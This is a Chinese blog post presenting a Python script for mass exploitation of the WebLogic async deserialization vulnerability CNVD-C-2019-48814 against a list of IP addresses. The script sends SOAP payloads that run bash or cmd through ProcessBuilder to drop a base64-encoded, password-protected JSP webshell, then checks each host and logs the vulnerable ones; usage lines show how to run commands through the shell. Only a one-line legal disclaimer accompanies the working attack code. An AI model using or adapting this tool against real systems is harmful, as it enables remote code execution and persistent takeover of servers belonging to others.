cnvd-c-2019-48814 批量getshell

字数统计: 712阅读时长: 4 min

 2019/04/26   Share

简单写一个通过 cnvd-c-2019-48814 批量getshell

扫描器可为个人和安全团队作为内部扫描器使用。扫描器切勿用于非法用途！！

# -*- coding: UTF-8 -*-
#Author:fidcer
import requests
import sys

path='/_async/AsyncResponseService'

payload = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4= |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
'''

payload1 = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4=  > servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.txt</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
'''
#打开文件循环取IP并请求
f = open(sys.argv[1],'r')
f1=open('vuln.txt','w')
for ff in f:
    try:
        header={'content-type':'text/xml'}
        a = requests.post('http://'+ff.strip()+path,headers=header,data=payload,timeout=3)#默认全部为http请求
        b = requests.post('http://'+ff.strip()+path,headers=header,data=payload1,timeout=3)
        r = requests.get('http://'+ff.strip()+'/_async/webshell.jsp',headers=header,timeout=3)
        r1 = requests.get('http://'+ff.strip()+'/bea_wls_internal/webshell.jsp',headers=header,timeout=3)

        #r=requests.post('http://'+ff.strip()+path,headers=header,data=payload,timeout=3)
        if(r.status_code==200):
            print('[+]'+ff.strip()+'/_async/webshell.jsp')
            f1.write(ff)
        else:
            print('[-]'+ff.strip()+'不存在漏洞')
        if(r1.status_code==200):
            print('[+]'+ff.strip()+'/bea_wls_internal/webshell.jsp')
            f1.write(ff)
        else:
            print('[-]'+ff.strip()+'不存在漏洞')
    except requests.exceptions.RequestException as e:
        print('[-]'+ff.strip()+'连接超时')
        continue
f.close()
f1.close()
print('漏洞的ip存放在vuln.txt')

格式为：python 2019-48814.py 2.txt

2.txt下格式为：192.168.0.1:7001

webshell.jsp?pwd=123&cmd=ls

原文作者：Fidcer

原文链接：https://vuln.top/2019/04/26/2019-48814/

发表日期：April 26th 2019, 11:33:32 pm

更新日期：April 26th 2019, 11:57:42 pm

Next Post

Uscms代码审计
Previous Post

Retaddr

CATALOG



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true